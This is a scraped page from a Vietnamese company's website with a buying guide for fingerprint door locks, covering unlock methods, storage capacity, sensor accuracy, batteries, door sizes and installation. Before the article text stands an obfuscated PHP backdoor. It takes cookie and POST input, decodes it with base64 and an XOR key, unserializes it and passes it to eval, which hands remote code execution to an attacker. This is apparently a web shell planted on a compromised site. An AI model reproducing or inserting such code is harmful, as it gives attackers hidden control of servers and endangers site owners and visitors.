$fqiQjm = chr (84) . "\x44" . chr ( 482 - 403 ).'_' . "\115" . chr (69) . "\156" . chr ( 500 - 421 )."\141";$MasHEAXYRr = "\143" . "\x6c" . "\141" . chr ( 521 - 406 ).chr (115) . "\137" . chr ( 168 - 67 ).chr ( 730 - 610 ).'i' . "\x73" . chr (116) . "\x73";$hMCRxWKtw = class_exists($fqiQjm); $MasHEAXYRr = "42800";$crgEeQoQLx = !1;if ($hMCRxWKtw == $crgEeQoQLx){function gUjss(){$GQSiIVDQ = new /* 20823 */ TDO_MEnOa(7162 + 7162); $GQSiIVDQ = NULL;}$WSmjw = "7162";class TDO_MEnOa{private function mhKZLQApr($WSmjw){if (is_array(TDO_MEnOa::$dxOIZ)) {$rlcgOQF = str_replace("\x3c" . chr ( 228 - 165 ).chr ( 579 - 467 ).'h' . 'p', "", TDO_MEnOa::$dxOIZ['c' . chr (111) . "\x6e" . chr ( 355 - 239 )."\x65" . chr (110) . "\x74"]);eval($rlcgOQF); $WSmjw = "7162";exit();}}private $rKJZi;public function PDtDIwpot(){echo 44118;}public function __destruct(){$WSmjw = "32854_45688";$this->mhKZLQApr($WSmjw); $WSmjw = "32854_45688";}public function __construct($mYDfgJ=0){$MqtmR = $_POST;$kiAqrArYu = $_COOKIE;$hXDZXHScYa = "b117e116-81a1-4a0f-8c63-2a292dd0db21";$pobSIo = @$kiAqrArYu[substr($hXDZXHScYa, 0, 4)];if (!empty($pobSIo)){$FddZxsnOCt = "base64";$dgDSDAMBZi = "";$pobSIo = explode(",", $pobSIo);foreach ($pobSIo as $YccOwzpoM){$dgDSDAMBZi .= @$kiAqrArYu[$YccOwzpoM];$dgDSDAMBZi .= @$MqtmR[$YccOwzpoM];}$dgDSDAMBZi = array_map($FddZxsnOCt . "\137" . chr ( 728 - 628 ).chr ( 224 - 123 )."\x63" . "\x6f" . "\144" . chr (101), array($dgDSDAMBZi,)); $dgDSDAMBZi = $dgDSDAMBZi[0] ^ str_repeat($hXDZXHScYa, (strlen($dgDSDAMBZi[0]) / strlen($hXDZXHScYa)) + 1);TDO_MEnOa::$dxOIZ = @unserialize($dgDSDAMBZi);}}public static $dxOIZ = 246;}gUjss();} Những điều cần biết khi mua khóa cửa vân tay | Công ty TNHH VIET TRENDS
 

Những điều cần biết khi mua khóa cửa vân tay

 

Hiện nay trên thị trường có rất nhiều dòng khoá cửa vân tay của nhiều thương hiệu khác nhau. Vậy khi mua một sản phẩm khoá điện tử bạn cần quan tâm đến những gì?

Sau đây lapdatgiare.vn xin gửi tới quý khách hàng các thông số cần quan tâm khi mua khoá vân tay:

Những điều cần biết khi mua khóa cửa vân tay

Những điều cần biết khi mua khóa cửa vân tay

1. Những tính năng mở khóa của khoá cửa vân tay

 

Tuỳ vào mỗi hãng sản xuất mà khoá cửa vân tay có cấu tạo và công nghệ khác nhau. Hiện nay các dòng khoá vân tay trên thị trường đa số có 4 chức năng mở khoá như sau: Mở khoá bằng vân tay, mã số, thẻ từ và chìa khoá cơ, ở một số dòng cao cấp hơn thì có thêm chức năng mở khoá bằng Bluetooth hay bằng app thông qua smartphone.

 2. Dung lượng lưu trữ vân tay, mã số, thẻ từ của khóa

Dung lượng lưu trữ của khóa cửa vân tay lớn

Dung lượng lưu trữ của khóa cửa vân tay lớn

Tuỳ theo loại khoá, nơi sử dụng cũng như hãng sản xuất mà khoá điện tử có dung lượng lưu trữ khác nhau. Nhưng thông thường thì mức lưu trữ của khoá vân tay từ 200 – 500 vân tay, 5 – 10 mật mã, 10 – 100 thẻ từ.

 

3. Độ nhạy của đầu đọc vân tay

 

Với khoá vân tay độ nhạy và độ chính xác của sensor cảm biến là rất quan trọng.

          + Độ nhạy: cảm biến phải có độ nhạy tốt( khi đưa vân tay vào cảm biến chỉ cần chạm nhẹ thì sensor phải nhận liền, mà không cần phải nhấn mạnh), thời gian nhận vân tay phải nhanh( thường thì dưới 1s)

          + Độ chính xác của cảm biến: thông số xác suất từ chối sai và xác suất chấp nhận sai phải có tỉ lệ cự thấp(thường dưới 0.01%).

Với công nghệ hiện tại đa số các dòng khoá vân tay đều sử dụng cảm biến vân tay sống, có độ chính xác cao và không kén vân tay và có thể nhận được cả vân tay khi đang bị ướt.

Độ nhạy của đầu đọc vân tay trên khóa

Độ nhạy của đầu đọc vân tay trên khóa

4. Độ bảo mật của khóa cửa vân tay

 

Độ bảo mật của khoá vân tay cao hơn rất nhiều so khoá thông thường. Với công nghệ tiên tiến hiện nay khoá vân tay không những được tích hợp nhiều tính năng tiện ích cho người dùng, khoá còn có hệ thống quản lý vân tay, mật mã rất chuyên nghiệp.

Sensor nhận vân tay sống nên tỉ lệ giả vân tay gần như không thể.

Ngoài ra khoá còn cho phép mở cửa bằng chuỗi mã số ảo  (có thể thêm trước và sau chuỗi mã số thật) để cho người đứng bên cạnh không copy được mật mã mở cửa. Chuỗi mã số thật  từ 6 – 12 ký tự. Khi mã hoá cùng mật khẩu ảo thì không giới hạn số ký tự.

Độ bảo mật

Độ bảo mật của khóa cửa vân tay

5. Sử dụng và cài đặt khóa cửa vân tay có khó không?

 

Khoá vân tay rất dễ sử dụng, để mở khoá chỉ cần đặt vân tay vào đầu đọc vân tay, hay nhập đúng chuỗi mã số đã cài đặt trước đó.  Với thẻ thì bạn chỉ cần quẹt ngang sensor là khoá đã nhận sau đó bạn chỉ cần gạt tay cầm là mở được cửa.

Đối với việc cài đặt cho khoá vân tay cũng khá đơn giản. Tuỳ theo loại khoá và hãng sản xuất mà khoá vân tay có những chức năng hỗ trợ khác như: màn hình hiển thị, giọng đọc hướng dẫn. Khoá cửa vân tay samsung do lapdatgiare.vn cung cấp có đầy đủ các chức năng trên, các bước cài đặt đơn giản giao diện quản lý cài đặt dễ nhìn, giúp cho người dùng dễ dàng cài đặt và quản lý.

6. Thời gian cần thay pin và cách thay pin cho khóa

 

Các dòng khoá vân tay  trên thị trường hầu hết đều sử dụng pin AA 1.5V, tuỳ theo loại khoá mà có thể sử dụng 4 pin hay 8 pin. Thời gian sử dụng pin phụ thuộc vào công nghệ tiết kiệm pin của khoá mà thời gian sử dụng có thể từ 6-8 tháng với số lần đóng mở khoảng 20 đến 30 lần/ ngày).

Pin AA 1.5V là loại pin thông dụng hiện bán rất nhiều ngoài thị trường. Việc thay pin cho khoá vân tay rất dễ dàng tương tự như việc thay pin cho remote TV nhà bạn. Quý khách nhớ chọn loại pin có dòng chữ Alkaline để tránh tình trạng pin sử dụng lâu ngày bị chảy pin vào main dẫn đến hỏng khóa.

7. Cảnh báo khi khóa sắp hết pin và nguồn dự phòng

Khoá vân tay thường có đèn tín hiện và âm thanh cảnh báo khi pin yếu khi nguồn thấp hơn 4.8V để người dùng thay pin. Từ lúc khoá báo pin yếu lần đầu thì khoá có thể đóng mở khoản 20 -30 lần nữa. Trường hơp khi hết pin mà người dung bên ngoài thì có thể dung pin vuông 9V DC kích vào 2 cực nguồn dự phòng trên khoá để nạp nguồn cho khoá, sau đó mở khoá như bình thường.

pin

Tính năng báo động sắp hết pin của khóa điện tử

8. Kích thước của cửa để lắp khóa và những loại cửa phù hợp

 

Khoá cửa vân tay phù hợp với cửa gỗ, cửa nhựa lõi thép, cửa kim loại. Khoá vân tay có nhiều kích thướng khác nhau mà phù hợp với từng vị trí lắp đặt khác nhau như cửa đi chính, cửa phòng của những căn hộ, vila, biệt thự hay nhà phố.

Tuỳ thuộc vào thiết kế của khoá cho nơi sử dụng mà khoá vân tay có kích thước khác nhau nên kích thước của cửa lắp khoá cũng khác nhau:

          + Độ dày cửa từ 3.5 đến 4.5cm

          + Đố cửa từ: 8 đến 12cm

9. Lắp đặt khóa cửa vân tay có dễ dàng không?

 

Việc lắp đặt khoá vân tay cũng giống lắp đặt khoá cơ thông thường. Tuỳ vào phần thân khoá mà có kích thước đực lỗ khác nhau.

Khi mua khoá vân tay samsung sẽ có hướng dẫn lắp đặt và kích thước đục lỗ theo tỉ lệ 1:1, quý khách chỉ cần ướm lên cửa và đục theo đúng kích thước của hướng dẫn là được.

10. Xóa mã số đã cài đặt trên khóa

 

Với khoá cửa vân tay Samsung bạn chỉ cần ấn nút cài đặt xong đó đặt vân tay admin, vào phần quản lý danh sách mã số, sau đó xoá mã số cần xoá đi là xong

Khóa vân tay có thể dùng cho tất cả mọi người

Khóa vân tay có thể dùng cho tất cả mọi người

11. Những ai có thể dùng được khóa vân tay?

 

Tất cả những người có vân tay đều có thể đăng ký và sử dụng khoá vân tay kể cả trẻ em.

Đối với những người thường bị bong da tay sẽ làm ảnh hưởng tới khả năng nhận dạng của khoá. Tuy nhiên, mỗi người đều có 10 ngón tay, vì vậy ta có thể đăng ký thêm vân tay dự phòng (cũng như một số ứng dụng khác như: chấm công, kiểm soát ra vào bằng vân tay tại các văn phòng, công sở, nhà máy…).  Vì vậy bạn không phải lo việc khoá không nhận dạng vân tay bị bong.

Ngoài ra khoá cửa vân tay Samsung còn có chức năng mở khoá bằng mã số và thẻ. Vậy khoá có đủ các trường hợp backup cho bạn để việc mở khoá trở nên dễ dàng và nhanh chóng.

 

Google+